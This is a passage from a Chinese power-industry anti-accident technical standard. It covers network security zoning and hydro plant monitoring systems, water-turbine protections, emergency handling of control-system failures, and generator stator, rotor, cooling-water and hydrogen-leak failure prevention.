纵向加密认证装置或者加密认证网关及相应设施。分散控制系统禁止采用安全风 险高的通用网络服务功能。分散控制系统的重要业务系统应当采用认证加密机 制。 9.8.2 分散控制系统在与其终端的纵向联接中使用无线通信网、电力企业其 他数据网(非电力调度数据网)或者外部公用数据网的虚拟专用网络方式(VPN) 等进行通信的,应当设立安全接入区。 9.8.3 安全接入区与分散控制系统中其他部分的联接处必须设置经国家指定 部门检测认证的电力专用横向单向安全隔离装置。 9.8.4 安全区边界应当采取必要的安全防护措施,禁止任何穿越分散控制系 统和管理信息大区之间边界的通用网络服务。 9.8.5 分散控制系统在设备选型及配置时,应当禁止选用经国家相关管理部 门检测认定并经监管机构通报存在漏洞和风险的系统及设备;对于已经投入运行 的系统及设备,应当按照监管机构的要求及时进行整改,同时应当加强相关系统 及设备的运行管理和安全防护。 9.8.6 分散控制系统中除安全接入区外,应当禁止选用具有无线通信功能的 设备。 9.9 防止水电厂(站)计算机监控系统事故 9.9.1 监控系统配置基本要求 (1)监控系统的主要设备应采用冗余配置,服务器的存储容量和中央处理 器负荷率、系统响应时间、事件顺序记录分辨率、抗干扰性能等指标应满足要求。 (2) 并网机组投入运行时,相关电力专用通信配套设施应同时投入运行。 (3) 监控系统网络建设应满足电力监控系统安全防护、电力行业信息系统 安全等级保护、关键信息基础设施安全保护等相关要求。 (4)严格遵循机组重要功能相对独立的原则,即监控系统上位机网络故障 不应影响现地控制单元功能、监控系统控制系统故障不应影响单机油系统、调速 97 系统、励磁系统等功能,各控制功能应遵循任一组控制器或其他部件故障对机组 影响最小、继电保护独立于监控系统的原则。 (5) 监控系统上位机应采用专用的、冗余配置的不间断电源供电,不应与 其他设备合用电源,且应具备无扰自动切换功能。交流供电电源应采用两路独立 电源供电。 (6) 现地控制单元及其自动化设备应采用冗余配置的不间断电源或站内直 流电源供电。具备双电源模块的装置,两个电源模块应由不同电源供电且应具备 无扰自动切换功能。 (7) 监控系统相关设备应加装防雷(强)电击装置,相关机柜及柜间电缆 屏蔽层应通过等电位网可靠接地。 (8)监控系统及其测控单元、变送器等自动化设备(子站)必须是通过具 有国家级检测资质的质检机构检验合格的产品。 (9) 监控设备通信模块应冗余配置,优先采用国内专用装置,采用专用操 作系统;支持调控一体化的厂站间隔层应具备双通道组成的双网,至调度主站(含 主调和备调)应具有两路不同路由的通信通道(主/备双通道)。 (10)水电厂基(改、扩)建工程中监控设备的设计、选型应符合自动化专 业有关规程规定。现场监控设备的接口和传输规约必须满足调度自动化主站系统 的要求。 (11) 自动发电控制(AGC)和自动电压控制(AVC)子站应具有可靠的 技术措施,对调度自动化主站下发的自动发电控制指令和自动电压控制指令进行 安全校核,确保发电运行安全。 (12) 监控机房应配备专用空调、环境条件应满足有关规定要求。 9.9.2 防止监控系统误操作措施 (1) 严格执行操作指令。当操作发生疑问时,应立即停止工作,并向发令 人汇报,待发令人再行许可,确认无误后,方可进行操作。 (2) 计算机监控系统控制流程应具备闭锁功能,远方、就地操作均应具备 防止误操作闭锁功能。 (3)非监控系统工作人员未经批准,不得进入机房进行工作(运行人员巡 回检查除外)。 98 9.9.3 防止网络瘫痪要求 (1) 计算机监控系统的网络设计和改造计划应与技术发展相适应,充分满 足各类业务应用需求,强化监控系统网络薄弱环节的改造力度,力求网络结构合 理、运行灵活、坚强可靠和协调发展。同时,设备选型应与现有网络使用的设备 类型一致,保持网络完整性。 (2) 电站监控系统与上级调度机构、集控中心(站)之间应具有两个及以 上独立通信路由。 (3) 通信光缆或电缆应采用不同路径的电缆沟(竖井)进入监控机房和主 控室;避免与一次动力电缆同沟(架)布放,并完善防火阻燃和阻火分隔等安全 措施,绑扎醒目的识别标志;如不具备条件,应采取电缆沟(竖井)内部分隔离 等措施进行有效隔离。 (4) 监控设备(含电源设备)的防雷和过电压防护能力应满足电力系统通 信站防雷和过电压防护要求。 (5) 在基建或技改工程中,若改变原有监控系统的网络结构、设备配置、 技术参数时,工程建设单位应委托设计单位对监控系统进行设计,深度应达到初 步设计要求,并按照基建和技改工程建设程序开展相关工作。 (6)监控网络设备应采用独立的自动空气开关供电,禁止多台设备共用一 个分路开关。各级开关保护范围应逐级配合,避免出现分路开关与总开关同时跳 开,导致故障范围扩大的情况发生。 (7) 实时监视及控制所辖范围内的监控网络的运行情况,及时发现并处理 网络故障。 (8) 机房内温度、湿度应满足设计要求。 9.9.4 监控系统管理要求 (1) 建立健全各项管理办法和规章制度,必须制订和完善监控系统运行管 理规程、监控系统运行管理考核办法、机房安全管理制度、系统运行值班与交接 班制度、系统运行维护制度、运行与维护岗位职责和工作标准等。 (2) 建立完善的密码权限使用和管理制度。 (3)制定监控系统应急预案和故障恢复措施,落实数据备份、病毒防范和 安全防护工作。 99 (4)按调度要求对调度范围内厂站远动信息进行测试。遥信传动试验应具 有传动试验记录,遥测精度应满足相关规定并按要求开展周期检验。 (5)规范监控系统软件和应用软件的管理,软件的修改、更新、升级必须 履行审批授权及责任人制度。在修改、更新、升级软件前,应对软件进行备份。 未经监控系统厂家测试确认的任何软件严禁在监控系统中使用,必须建立有针对 性的监控系统防病毒、防黑客攻击措施。 (6) 定期对监控设备的滤网、防尘罩进行清洗,做好设备防尘、防虫工作。 9.10 防止水机保护失灵 9.10.1 水机保护设置 (1) 水轮发电机组应设置电气、机械过速保护、调速系统事故低油压保护、 导叶剪断销剪断保护(导叶破断连杆破断保护)、机组振动和摆度保护、轴承温 度过高保护、轴承冷却水中断、轴承外循环油流中断、主轴密封水中断、灯泡头 水位过高、快速闸门(或主阀)、真空破坏阀等水机保护功能或装置。 (2) 在机组 C 级及以上停机检修期间,应对水机保护装置报警及出口回 路等进行检查及联动试验,合格后在机组开机前按照相关规定投入。 (3) 所有水机保护模拟量信息、开关量信息应接入电站计算机监控系统, 实现远方监视。 (4) 设置的紧急事故停机按钮应能在现地控制单元失效情况下完成事故停 机功能,必要时可在远方设置紧急事故停机按钮。 (5) 水机保护压板应与其他保护压板分开布置,并粘贴标示。 (6) 水轮机保护装置应配置独立于机组 LCU 电源。 9.10.2 防止机组过速保护失效 (1)机组电气和机械过速出口回路应单独设置,装置应定期检验,检查各 输出接点动作情况。 (2)装置校验过程中应检查装置测速显示连续性,不得有跳变及突变现象, 如有应检查原因或更换装置。 (3) 电气过速装置、输入信号源电缆应采取可靠的抗干扰措施,防止对输 入信号源及装置造成干扰。 9.10.3 防止调速系统低油压保护失效 100 (1) 调速系统油压监视变送器或油压开关应定期进行检验,检查定值动作 正确性。 (2) 在无水情况下模拟事故低油压保护动作,导叶应能从最大开度可靠全 关。 (3) 油压变送器或油压开关信号电源不得接反,并检查变送器或油压开关 供油手阀在全开位置。 9.10.4 防止机组剪断销剪断保护(破断连杆破断保护)失效 (1) 定期检查剪断销剪断保护装置(导叶破断连杆破断保护装置),在发 现有装置报警时,应立即安排机组停机,检查导叶剪断销及剪断销保护装置(导 叶破断连杆及连杆破断保护装置)。 (2)剪断销(破断连杆)信号电缆应绑扎牢固,防止电缆意外损伤。 (3) 应定期对机组顺控流程进行检查,检查机组剪断销剪断(破断连杆破 断)与机组事故停机信号判断逻辑,并在无水情况下进行联动试验。 9.10.5 防止轴承温度过高保护失效 (1) 应定期检查机组轴承温度过高保护逻辑及定值的正确性,并在无水情 况下进行联动试验。运行机组发现轴承温度有异常升高,应根据具体情况立即安 排机组减出力运行或停机,查明原因。 (2)机组轴承测温电阻输出信号电缆应采取可靠的抗干扰措施。 (3)测温电阻线缆在油槽内需绑扎牢固。 (4)机组 B 级及以上检修过程中应对轴承测温电阻进行校验,对不合格的 测温电阻应检查原因或进行更换。 (5)所有瓦(每块或每瓣)均应安装测温电阻,所有瓦均应具备报警、停 机功能。 9.10.6 防止轴电流保护失效 (1) 机组检修过程中应对轴电流保护装置定值进行检验,检查定值动作正 确性,并在无水情况下进行联动试验。 (2) 机组大修过程中应对各导轴承进行绝缘检查,发现轴承绝缘下降时应 进行检查、处理。 (3) 定期对导轴承润滑油质进行化验,检查有无劣化现象。如有劣化现象 101 应查明原因,并及时进行更换处理。 (4) 轴电流输出信号电缆应采取可靠的抗干扰措施。 (5) 轴电流互感器应安装可靠、牢固。 9.11 主控系统失灵的紧急处理措施 9.11.1 已配备分散控制系统的电厂,应根据机组的具体情况,建立分散控制 系统故障时的应急处理机制,制定在各种情况下切实可操作的分散控制系统故障 应急处理预案,并定期进行反事故演习。 9.11.2 当全部操作员站出现故障时(所有上位机“黑屏”或“死机”),应立即 执行停机、停炉预案。 9.11.3 当部分操作员站出现故障时,应由可用操作员站继续承担机组监控任 务,停止重大操作,同时迅速排除故障,若故障无法排除,则应根据具体情况启 动相应应急预案。 9.11.4 当系统中的控制器或相应电源故障时,应采取以下对策: (1) 辅机控制器或相应电源故障时,可切至后备手动方式运行并迅速处理 系统故障,若条件不允许则应将该辅机退出运行。 (2) 调节回路控制器或相应电源故障时,应将执行器切至就地或本机运行 方式,保持机组运行稳定,根据处理情况采取相应措施,同时应立即更换或修复 控制器模件。 (3) 涉及控制器故障时应立即更换或修复控制器模件,涉及机炉保护电源 故障时则应采用强送措施,此时应做好防止控制器初始化的措施。若恢复失败则 应紧急停机停炉。 10 防止发电机及调相机损坏事故的重点要求 10.1 防止定子绕组故障 10.1.1 防止定子绕组端部绝缘损坏 10.1.1.1 200MW 及以上汽轮发电机、燃气轮发电机、100Mvar 及以上调相 机,新建、投运 1 年后及每次大修时应检查定子绕组端部的紧固、磨损情况,存 在松动、磨损情况应及时处理;并按照相关标准进行模态试验,试验结果应与历 史数据进行比较。试验数据不合格时应综合历史数据和运行情况进行分析,制定 相应的检修及运维措施。多次出现松动、磨损情况时,应重新对绕组端部进行整 102 体绑扎;多次出现大范围松动、磨损情况时,应对绕组端部结构进行改造或加装 绕组端部振动在线监测系统监视运行。 10.1.1.2 新机出厂时或现场安装绕组后应进行定子绕组端部起晕试验,并提 供试验报告。定子绕组运行于空气介质的,应根据检修计划定期进行电腐蚀检查, 并进行电晕试验确定起晕电压及放电点位置,根据电晕试验结果及发展趋势制定 处理方案。定子绕组运行于氢气介质的,当端部检查存在明显电腐蚀特征时,应 开展起晕试验,并根据试验结果指导修复工作。 10.1.1.3 加强大型发电机和调相机的环形引线、过渡引线、主引线、鼻部手 包绝缘、引水管水接头等部位的绝缘检查。定子绕组采用水内冷的发电机、调相 机交接及大修时,应对定子绕组手包绝缘进行试验,及时发现和处理缺陷,大修 时应尽可能在通水或充水条件下进行。 10.1.1.4 抽蓄机组定子线棒端部接头应采用全封闭环氧浇注绝缘结构,对于 已投运的采用其他绝缘结构的机组,应要求制造厂重新进行端部绝缘设计,及时 改造。 10.1.2 防止定子绕组槽部绝缘损坏 10.1.2.1 新机投运满 1 年后及每次大修时,应对定子槽部进行检查或试验, 当出现以下情况时采取更换槽楔、部分或全部重打槽楔等措施: (1) 同一槽内连续多个槽楔发生松动; (2) 铁心端部槽楔发生松动; (3) 大面积槽楔松动(如超过 25%)或较上次检查松动槽楔数量明显增加; (4) 发现槽楔开裂等严重缺陷; (5) 槽内半导体垫条、绝缘垫条大面积窜出。 10.1.2.2 机组运行或检查中出现以下问题时,应及时查明原因,怀疑存在槽 部防晕层损坏的应进行槽电位测量或槽放电探测,试验结果异常的应及时处理: (1) 在线局放监测数据随负荷增加而急剧增加; (2) 空冷机组冷却空气中出现大量臭氧; (3) 运行中测温元件电位升高; (4) 定子槽楔大面积松动; (5) 铁心通风道内、槽楔附近可见绝缘磨损产生的粉末或黑色油泥; (6) 相出线端高电位线棒上有局放蚀损或燃弧迹象。 103 10.1.3 防止绝缘受潮 10.1.3.1 氢冷发电机应配置具有强制氢气循环功能的氢气干燥器,干燥塔宜 采用循环再生结构,吸湿和再生环节应能自动循环切换保证连续对氢气进行干 燥,吸附剂宜选用活性氧化铝,氢气干燥器应配备精度合格、具备防爆和防油污 等基本功能的湿度检测仪表。 10.1.3.2 氢冷发电机运行中,应严格控制机内氢气湿度。保证氢气干燥器始 终处于良好工作状态,并定期进行在线监测和手工检测比对,防止单一指示误差造成 误导。机组停机状态下,处于空气环境中的绕组应根据环境湿度采取驱潮措施; 充氢状态下,应根据氢气湿度情况启动氢气干燥器强制除湿功能。 10.1.3.3 密封油系统回油管路应保证回油畅通并加强监视,防止密封油进入 发电机内部影响氢气湿度。密封油系统油净化装置和自动补油装置应随发电机组 投入运行,并定期检测密封油含水量等指标,密封油质量应符合相关标准要求。 10.1.3.4 新建水内冷机组应有单独引出的汇水管接地端子,方便检修及启动 前进行绝缘电阻、直流泄漏电流测量。 10.1.4 加强定子绝缘局部放电在线监测 10.1.4.1 300MW 及以上发电机、100Mvar 及以上调相机,宜配备定子绕组 绝缘局部放电在线监测装置,并优先选用具备模式分析、噪声分离功能的监测装 置。 10.1.4.2 监测装置报警时,应先排除封闭母线段关联设备的干扰,并结合历 史趋势、报警频次、放电特征、负荷相关性等信息进行综合分析,如存在局放量 异常增高并持续增长的情况,应及时停机检查。 10.2 防止定子铁心故障 10.2.1 加强铁心制造阶段质量控制,防止由于制造缺陷引起的绝缘损伤或片 间短路。铁心出厂前应进行铁心磁化试验,并出具试验报告。现场安装过程中避 免铁心表面擦碰导致的叠片表层绝缘损伤。 10.2.2 运行中,加强对机座振动及异音的监测,存在异常时应对振动频谱进 行分析,当存在显著增长的 100Hz 频率分量时,应分析铁心松动的可能性,并 制定停机检查计划。 10.2.3 检修时,应结合运行振动数据、外观检查情况,采用插刀试验或穿心 螺杆预紧力复核等方法对铁心紧固情况进行判断。运行中机座存在异音的机组, 104 应对绕组端部固定情况、定位筋与铁心接触情况、穿心螺杆紧固情况、隔振结构 性能进行重点检查,存在异常时应采取措施及时处理,防止缺陷扩大。 10.2.4 检修中应检查铁心是否存在局部松齿、叠片短缺、局部烧熔或过热、 外表面附着黑色油污等问题,结合实际异常情况必要时进行铁心磁化试验或定子 铁心故障诊断试验(ELCID),检查有无铁心过热以及铁心片间绝缘短路情况, 分析缺陷原因及时进行处理。对测温元件绝缘电阻进行检查,防止因测温元件及 引线绝缘损伤导致片间短路。 10.2.5 水轮发电机新机设计时,定子铁心穿心螺杆宜采用全绝缘结构,若采 用分段绝缘结构,应有可靠措施防止穿心螺杆和铁心间脏物进入造成穿心螺杆绝 缘下降,穿心螺杆本体应进行绝缘处理,在 A 级检修或必要时,应进行穿心螺 杆绝缘电阻测试,有条件的可采用穿心螺杆绝缘在线监测。 10.2.6 应合理选择机组接地方式并合理配置定子单相接地保护定值和出口 方式,以保证机组单相接地故障电流满足制造厂要求。 10.3 防止转子绕组故障 10.3.1 防止转子绕组匝间短路 10.3.1.1 加强转子制造过程的质量管控,防止因制造工艺问题导致转子绕组 匝间短路。转子在运输、存放过程中应满足防尘、防冻(储存温度不应低于 5℃)、 防潮和防机械损伤等要求,严格防止转子内部落入异物。 10.3.1.2 运行中应监视密封油系统运行情况,确保密封油系统平衡阀、压差 阀动作灵活、可靠,避免发电机进油造成转子运行环境劣化。 10.3.1.3 加强机组运行数据分析,当出现以下情况时应分析转子绕组存在匝 间短路的可能性,必要时降低负荷运行: (1) 转子振动增加并与励磁电流变化有明显相关性; (2) 在相同工况或试验条件下,励磁电流值明显增大; (3) 对于定子膛内安装有探测线圈等磁通传感器的机组,监测波形异常; (4) 转子磁化造成轴电压异常升高。 当判断发电机转子绕组存在严重的匝间短路时,应尽快停机检修。 10.3.1.4 停机检查(如发现转子磁化等)、例行试验或运行中怀疑存在匝间 短路的转子,应开展重复脉冲法(RSO)试验或转子频域阻抗分析(FIA)试验 进行综合诊断。有条件时,应在交接及历次检修时开展频域阻抗分析试验,留取 105 阻抗频谱数据,对转子绝缘状态进行跟踪分析。 10.3.1.5 转子在运行中存在异常,但静态试验数据无明显异常时,应进行动 态匝间短路诊断试验。 10.3.1.6 对于确认存在匝间短路缺陷的机组,应根据匝间短路的严重情况, 制定安全运行条件及检修消缺计划。当存在较严重转子绕组匝间短路时,应尽快 消缺,防止转子、轴瓦等部件磁化。发电机转子、轴承、轴瓦发生磁化(参考值: 轴瓦、轴颈>10×10-4T,其他部件>50×10-4T)应进行退磁处理。退磁后剩磁参考 值为:轴瓦、轴颈小于 2×10-4T,其他部件小于 10×10-4T。 10.3.1.7 运行超过 20 年的隐极式发电机或调相机,宜加装转子绕组匝间短 路在线监测装置,并对在线监测数据进行定期分析。 10.3.1.8 水轮发电机新机设计时,制造厂应核算转子励磁回路突然断路、定 子绕组短路或缺相等事故工况下磁极线圈匝间过电压分布,磁极线圈匝间绝缘设 计应能承受发生上述故障时产生的过电压冲击。 10.3.2 防止转子绕组接地短路 10.3.2.1 当转子励磁回路接地保护报警时,应先对转子外部励磁回路进行检 查并尝试消缺,经分析确定为稳定性的金属接地且无法排除故障时,应立即停机 处理。 10.3.2.2 发电机组启动时,根据相关标准要求进行额定转速下转子绕组绝缘 测量或开展转子绝缘在线监测,及时发现动态接地隐患。 10.3.2.3 机组停机及检修时,应采取相关措施防止转子受潮及异物进入风 道。 10.3.3 防止转子绕组引线故障 10.3.3.1 大修时应利用内窥镜检查等方法,检查转子绕组引线及固定结构等 是否存在松动、过热、开裂等迹象,并进行转子直流电阻测量和分析,当消除测 试条件影响后直流电阻存在明显增大时,应进一步检查绕组引线是否存在异常。 10.3.3.2 机组每次空载启动时,应记录转子励磁电流、电压及相关温度数据, 并与历史数据进行比较,如出现明显异常应进行运行数据及绝缘过热监测数据的 分析。运行中如存在励磁电流和无功功率异常下降,应分析转子引线过热的可能 性,并采取降负荷或停机等措施,防止故障扩大。 10.3.3.3 抽蓄机组新机设计时,磁极连接线应采用抗疲劳结构,若采用刚性 106 磁极连接线,应采用整板加工的一体铜排,不应使用拼焊成型结构,连接线的受 力情况要经计算分析。磁极连接线铜排直角平弯时,弯曲半径应不小于 2d(d 为铜排厚度),经计算应力较大部位,应优化磁极连接线结构,改善磁极连接线 应力。转子励磁引线穿轴段宜采用一体化铜排连接或分段焊接连接结构,对于已 投产采用穿轴螺杆的机组,存在隐患的应要求制造厂重新进行设计,并及时改造。 10.3.3.4 水轮发电机新机设计时,磁极连接线在磁轭与磁极上均设有固定点 时,应在连接中设计补偿装置,以吸收磁极与磁轭的相对位移、振动产生的拉伸 应力。 10.3.3.5 水轮发电机现场安装磁极连接铜排过程中,应保持铜排在自由状态 下连接固定,安装矫正时不应引起连接线受损;定期检查或检修时,应检查磁极 引出线根部、磁极连接线弯曲处等应力集中部位有无裂纹情况,通流部件有无过 热、螺栓松动等情况。 10.3.4 防止调峰机组转子绕组故障 10.3.4.1 对于参与调峰运行的新建发电机,应在设备订货时提出针对性要 求,确保满足调峰运行需要。 10.3.4.2 对于通过技术改造参与调峰运行的机组,改造前应对机组改造方案 进行评估,保证改造方案满足机组调峰运行要求,并制定针对调峰运行的运行措 施及检修计划,防止转子绕组发生热变形、匝间短路等故障。 10.3.4.3 对参与调峰运行的 300MW 及以上容量的汽轮发电机,尤其是结构 上未针对调峰进行改造的机组,机组投运 1 年后应进行专项检修。利用内窥镜 检查转子绕组端部和极间连接线有无过热变色、变形、端部垫块松动、匝间绝缘 移位等问题,必要时拔下转子护环检查与本体嵌装部位有无裂纹和蚀坑。 10.3.4.4 对于频繁调峰的机组,应加装转子绕组匝间短路在线监测装置或定 期开展针对性的转子运行相关数据分析工作,已安装在线监测装置的应对在线监 测数据进行定期分析。 10.4 防止转子大轴及护环损伤 10.4.1 水平放置转子在到货存储、安装及检修期间,应采取转子中部增加合 适支撑或定期(不超过两周)翻转 180°等措施防止转子大轴弯曲。 10.4.2 转子在运输、存放及大修期间应避免受潮和腐蚀。大修时,应对转子 护环进行无损探伤和金相检查(对 Mn18Cr18 系钢制护环,从机组第三次 A 级 107 检修起开始进行),检出有裂纹或蚀坑应根据严重程度进行局部处理或更换。测 量并记录护环与铁心轴向间隙,与出厂及上次测量数据比对,以判断护环是否存 在位移。 10.4.3 转子转轴非接地端轴承(座)与底板和油管间应设置绝缘结构,便于 在运行中测量该轴承(座)与底板间的绝缘电阻,防止产生轴电流损坏轴瓦。运 行中应定期测量轴电压,轴电压升高时,应首先检查转子大轴接地是否良好、励 磁回路阻容吸收装置是否正常,必要时分析轴电压成分,确定成因后制定相应处 理措施。 10.4.4 水轮机组运行中,轴承轴电流保护或轴绝缘监测回路应正常投入,出 现轴电流或轴绝缘报警应及时检查处理,禁止机组长时间无轴电流保护或无轴绝 缘监测运行。 10.5 防止内冷水系统故障 10.5.1 防止水路堵塞 10.5.1.1 定子绕组端部引线水路通流截面应达到设计值,引出线外部水路的 安装应严格按照厂家的图纸和要求进行,保证(总)水管焊接位置有效截面积满 足设计要求。 10.5.1.2 水内冷转子进水支座安装时应严格按照制造厂的安装图纸和技术 规范进行,保证安装精度,防止盘根等部位磨损造成转子水路堵塞。 10.5.1.3 定子、转子冷却系统应采用耐蚀性能不低于 S30408 不锈钢材质的 水泵、管道和阀门,防止锈蚀产物进入内冷水系统。 10.5.1.4 水内冷系统中管道、阀门的橡胶密封圈应全部使用聚四氟乙烯垫 圈,并应定期(不宜超过 1 个大修期)更换。检修过程中涉及水回路再密封时, 应严格按照制造厂施工工艺要求开展,禁止随意更改密封措施。 10.5.1.5 绕组线棒在制造、安装、检修过程中,若放置时间较长,应将线棒 内的水放净并及时吹干,防止空心导线内表面产生氧化腐蚀。有条件时可进行充 氮保护。 10.5.1.6 定期对定子线棒进行反冲洗(线棒出水端安装节流孔板的发电机除 外),反冲洗回路不锈钢滤网应达到 200 目(75μm),并定期检查和清洗滤网。 机组运行期间发电机水路反冲洗门应关闭严密并上锁。反冲洗时应按照相关标准 要求进行,反冲洗的流量、流速应大于正常运行中的流量、流速(或按制造厂的 108 规定),冲洗直到排水清澈、无可见杂质,进、出水的 pH 值、电导率基本一致 且达到要求时终止。 10.5.1.7 交接及大修时应进行水系统流通性检查,分支路进行流量试验或进 行热水流试验。 10.5.1.8 内部水回路充水时应彻底排气,防止由于环形引线“气堵”导致的过 热烧损。 10.5.1.9 水内冷机组的内冷水质应按照相关标准进行优化控制,长期不能达 标的发电机应选择适用的内冷水处理方法进行设备改造。机组运行过程中,应在 线连续测量内冷水的电导率和 pH 值,定期测定含铜量、溶氧量等参数。 10.5.1.10 严格按规范安装温度测点,做好防止感应电影响温度测量的措施, 防止温度跳变、显示误差。运行中实时监测发电机各部位温度,当发电机(绕组、 铁心、冷却介质)的温度、温升、温差与正常值有较大的偏差时,应立即分析查 找原因。温差控制值应按制造厂规定,制造厂未明确规定的,应按照以下限额执行: 对于水内冷定子线棒层间测温元件的温差达 8℃或定子线棒引水管同层出水 温差达 8℃应报警,并及时查明原因,必要时降低负荷或停机;当定子线棒层间 温差达 14℃,或定子引水管出水温差达 12℃,或任一定子槽内层间测温元件温 度超过 90℃,或出水温度超过 85℃时,应立即降低负荷,在确认测温元件无误 后应立即停机,进行反冲洗及有关检查处理。经反冲洗无明显效果时,应依据相 关标准综合分析内冷水系统结垢的可能性,并委托专业机构进行化学清洗。 10.5.1.11 对于内冷水系统存在漏氢隐患的机组,应加强出水温度的监测, 防止由于气堵造成线棒过热。 10.5.1.12 运行中严格保持水内冷转子进水支座盘根冷却水压力低于转子内 冷水进水压力,以防盘根材料破损物进入转子分水盒内。 10.5.2 防止内冷水系统断水 10.5.2.1 内冷水系统中的主要部件,如水泵、冷却器和过滤器等应采用冗余 设计,确保系统的连续运行。内冷水系统内所有部件的容量或处理能力应有相应 的裕度。主水泵及备用水泵应由两段不同母线供电。 10.5.2.2 加强定子内冷水泵的运行维护,备用水泵应处在热备用状态,防止 切换时因备用水泵故障造成定子水回路断水,严防水箱水位偏低或水量严重波动 导致断水故障。 109 10.5.2.3 断水保护装置的信号宜采用直接测量流量的方式或采用流量孔板 测量方式,信号宜选择流量测量装置的前后差压开关量,并满足三取二原则,三 个信号应独立取样。运行中定子绕组断水最长允许时间应符合制造厂规定,开关 量信号以硬接线方式送至发电机断水保护,并作用于跳闸。 10.5.2.4 定冷水压力测量应考虑测点位差影响,且压力测点应在流量调节装 置之后。管道条件允许时,定冷水流量装置应装设在反冲洗支管接口之后的定子 内冷水管道,确保准确体现实际进入发电机的冷却水流量。 10.5.3 防止定子、转子绕组漏水 10.5.3.1 绝缘引水管不得交叉接触,不得附着、捆绑其他附属装置,引水管 之间、引水管与端罩之间应保持足够的绝缘距离。检修中应加强绝缘引水管检查, 引水管外表面应无伤痕。 10.5.3.2 做好漏水报警装置调试、维护和定期检验工作,确保装置反应灵敏、 动作可靠,并定期对管路进行疏通检查,确保管路畅通。 10.5.3.3 水内冷转子绕组复合引水管应采用具有钢丝编织护套的复合绝缘 引水管。 10.5.3.4 100MW 及以上发电机、100Mvar 及以上调相机的转子出水拐角应 采用高强度不锈钢材质,以防止转子线圈拐角断裂漏水。 10.5.3.5 机组大修期间,应对内冷水系统密封性进行检验。当对水压试验结 果不确定时,宜用气密试验查漏。 10.5.3.6 对于不需拔护环即可更换转子绕组导水管密封件的特殊机组,大修 期应更换密封件,以确保转子冷却的可靠性。 10.5.3.7 水内冷机组发出漏水报警信号,经判断确认是内部漏水时,应立即 停机处理。 10.5.3.8 机内氢压应高于定子内冷水压,其差压应按厂家规定执行。如厂家 无规定,差压应大于 0.05MPa。 10.6 防止发生局部过热 10.6.1 防止铁心及绕组过热 10.6.1.1 新机制造时,定子铁心、定子线圈层间埋入式测温元件应采用冗余 设置,保证各测点有备用替换元件。 10.6.1.2 定子绕组现场装配时,绕组端部所有的接头和连接应采用银铜焊接 110 工艺,接头处的载流能力不得低于同回路的其它部位。 10.6.1.3 水轮发电机励磁引线及磁极连接线的接头应采用镀银或搪锡工艺, 制造厂应对接触面的电流密度进行计算校核,确保机组运行时接触面的温升在安 全范围内。 10.6.1.4 安装及大修时,应对定子铁心通风槽进行检查,防止由于油污、灰 尘或异物等造成通风槽堵塞引起铁心局部过热。安装及大修时,对风冷转子进行 通风试验,发现风路堵塞时及时处理;穿转子前应再次检查所有通风孔,避免因 遗留异物造成堵塞。 10.6.1.5 运行中,应加强氢气冷却器、空气冷却器水流量监测,当出现水流 量不足或断水情况时及时处理。氢内冷发电机定子线棒出口风温差达到 8℃或定 子线棒间温差超过 8℃时,应立即停机处理。 10.6.1.6 对于运行中多次过励的机组,检修时应重点检查铁心背部是否存在 过热痕迹;对于深度进相的机组,运行中加强对铁心端部的温度监测,检修时应 重点对端部结构件和铜屏蔽等进行检查。 10.6.1.7 加强交接及历次大修时对定子绕组直流电阻的测量及结果分析,对 于直流电阻有增长趋势或超标的,应结合敲击法或大电流红外成像法等手段进行 缺陷定位并及时处理。 10.6.2 加强绝缘过热监测装置管理 10.6.2.1 300MW 及以上汽轮发电机、燃气轮发电机及 100Mvar 及以上调相 机宜安装绝缘过热监测装置,监测装置应具备对 0.1μm 以下烟气微粒的检测能 力,当绝缘存在早期过热(对于 F 级绝缘达到 230℃)时应可靠报警。 10.6.2.2 装置发生报警时,运行人员应及时记录并上报发电机运行工况及电 气和非电量运行参数,就地核对监测装置是否正常,并排除油污、气流变化等影 响,不得盲目将报警信号复位或随意降低监测装置检测灵敏度。 10.6.2.3 经检查确认非监测装置误报后,应立即取样进行色谱分析。对于铁 心局部过热可能引发的单次短时报警,不应简单视为误报,应作好报警信息及相 关运行数据的记录分析,必要时停机进行消缺处理。当出现持续、频繁报警并核 对无误后,应停机处理。 10.7 防止氢冷发电机漏氢 10.7.1 防止经冷却系统漏氢 111 10.7.1.1 水氢氢冷发电机内冷水箱应加装氢气含量检测装置,量程范围应满 足 0%~20%(体积浓度)测量要求,定期进行巡视检查,做好记录。氢气含量检 测装置的探头应结合机组检修进行定期校验。 10.7.1.2 内冷水箱漏氢监测数据应以未进行补排水、水箱液位稳定时为准。 当含氢量(体积含量)超过 2%应报警,并加强对发电机的监视,超过 10%应立 即停机消缺。对于闭式水箱,氢气浓度应在排气阀开启状态下,水箱上部气体达 到动态稳定时测量。 10.7.1.3 加装气体流量表的机组,应定期记录流量表的示数,并对单位时间 内增量进行趋势分析。当单位时间内增量明显增大时,应首先排除保护气体、水 温或水位变化等因素的影响,实际增量超出制造厂规定值时,应安排消缺或停机, 制造厂未做规定时按照以下标准执行:漏氢量达到 0.3m3/d 时应在计划停机时安 排消缺,漏氢量大于 5m3/d 时应立即停机处理。 10.7.1.4 有条件时开展水内溶解氢量检测(或监测),通过与同类机组及历 史数据比较或计算等效漏氢量,判断是否存在漏氢缺陷。 10.7.1.5 运行中内冷水质明显变化时(如 pH 值减小、电导率上升),应结 合以上分析判断是否存在漏氢。 10.7.1.6 氢气冷却器的冷却水压异常上升时,应检查是否存在漏氢问题,并 及时处理。 10.7.2 防止经油系统漏氢 10.7.2.1 严密监测氢冷发电机油系统、主油箱内的氢气体积含量,确保避开 含量在 4%~75%的可能爆炸范围。 10.7.2.2 机组安装和检修时应严格按要求调整密封瓦间隙,密封油系统平衡 阀、压差阀必须保证动作灵活、可靠,运行应监视氢油压差变化。发现发电机大 轴密封瓦处轴颈存在磨损沟槽,应及时处理。 10.7.3 防止经密封结合面、外部管路及转子漏氢 10.7.3.1 发电机端盖密封面、密封瓦法兰面、机壳检修孔法兰面以及氢系统 管道法兰面、水系统、监测系统的管路法兰和阀门、氢干燥器内部管路法兰和阀 门等所使用的密封材料(包含橡胶垫、圈等),经检验合格后方可使用。严禁使 用合成橡胶、再生橡胶制品。 10.7.3.2 发电机内外进出水管、氢气管路、排污管等的焊缝应在每次大修中 112 进行全面检查,防止焊口运行中开裂泄漏。 10.7.3.3 交接和大修时应对发电机转子进行气密性试验,防止运行中经导电 螺杆漏氢,宜在发电机励磁罩壳内安装危险气体监测探头,并定期校验。 10.7.3.4 整机气密试验不合格的氢冷发电机严禁投入运行。 10.7.4 防止经出线箱及封闭母线漏氢 10.7.4.1 发电机出线箱与封闭母线连接处应装设隔氢装置,并在出线箱顶部 